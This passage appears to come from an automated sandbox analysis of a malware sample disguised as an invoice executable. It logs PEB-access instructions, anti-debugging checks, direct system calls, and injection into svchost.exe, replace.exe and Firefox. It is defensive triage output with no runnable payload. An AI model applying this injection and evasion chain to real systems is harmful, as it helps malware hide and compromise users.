            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03902B57 mov eax, dword ptr fs:[00000030h]2_2_03902B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6B40 mov eax, dword ptr fs:[00000030h]2_2_038C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FAB40 mov eax, dword ptr fs:[00000030h]2_2_038FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8B42 mov eax, dword ptr fs:[00000030h]2_2_038D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828B50 mov eax, dword ptr fs:[00000030h]2_2_03828B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEB50 mov eax, dword ptr fs:[00000030h]2_2_038DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382CB7E mov eax, dword ptr fs:[00000030h]2_2_0382CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383EA80 mov eax, dword ptr fs:[00000030h]2_2_0383EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904A80 mov eax, dword ptr fs:[00000030h]2_2_03904A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03868A90 mov edx, dword ptr fs:[00000030h]2_2_03868A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03838AA0 mov eax, dword ptr fs:[00000030h]2_2_03838AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886AA4 mov eax, dword ptr fs:[00000030h]2_2_03886AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03886ACC mov eax, dword ptr fs:[00000030h]2_2_03886ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830AD0 mov eax, dword ptr fs:[00000030h]2_2_03830AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03864AD0 mov eax, dword ptr fs:[00000030h]2_2_03864AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386AAEE mov eax, dword ptr fs:[00000030h]2_2_0386AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BCA11 mov eax, dword ptr fs:[00000030h]2_2_038BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA24 mov eax, dword ptr fs:[00000030h]2_2_0386CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385EA2E mov eax, dword ptr fs:[00000030h]2_2_0385EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03854A35 mov eax, dword ptr fs:[00000030h]2_2_03854A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA38 mov eax, dword ptr fs:[00000030h]2_2_0386CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836A50 mov eax, dword ptr fs:[00000030h]2_2_03836A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03840A5B mov eax, dword ptr fs:[00000030h]2_2_03840A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CA6F mov eax, dword ptr fs:[00000030h]2_2_0386CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DEA60 mov eax, dword ptr fs:[00000030h]2_2_038DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038ACA72 mov eax, dword ptr fs:[00000030h]2_2_038ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038429A0 mov eax, dword ptr fs:[00000030h]2_2_038429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038309AD mov eax, dword ptr fs:[00000030h]2_2_038309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov esi, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B89B3 mov eax, dword ptr fs:[00000030h]2_2_038B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C69C0 mov eax, dword ptr fs:[00000030h]2_2_038C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A9D0 mov eax, dword ptr fs:[00000030h]2_2_0383A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038649D0 mov eax, dword ptr fs:[00000030h]2_2_038649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA9D3 mov eax, dword ptr fs:[00000030h]2_2_038FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE9E0 mov eax, dword ptr fs:[00000030h]2_2_038BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038629F9 mov eax, dword ptr fs:[00000030h]2_2_038629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE908 mov eax, dword ptr fs:[00000030h]2_2_038AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC912 mov eax, dword ptr fs:[00000030h]2_2_038BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828918 mov eax, dword ptr fs:[00000030h]2_2_03828918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904940 mov eax, dword ptr fs:[00000030h]2_2_03904940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039008C0 mov eax, dword ptr fs:[00000030h]2_2_039008C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 6496Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeJump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CEE008Jump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Revised Invoice H000127896.exe"Jump to behavior
            Source: C:\Program Files (x86)\yZebcAvswCnnmSaFNgEKMWBnVXVopXrYboEjYpDaNxPueIjgBNIyzntcKfVcUXrHFh\MUjPkRkjOWKkX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Revised Invoice H000127896.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: Revised Invoice H000127896.exe, MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: MUjPkRkjOWKkX.exe, 00000004.00000002.3292308483.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000004.00000000.2444157765.0000000001231000.00000002.00000001.00040000.00000000.sdmp, MUjPkRkjOWKkX.exe, 00000007.00000002.3292749248.00000000016B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
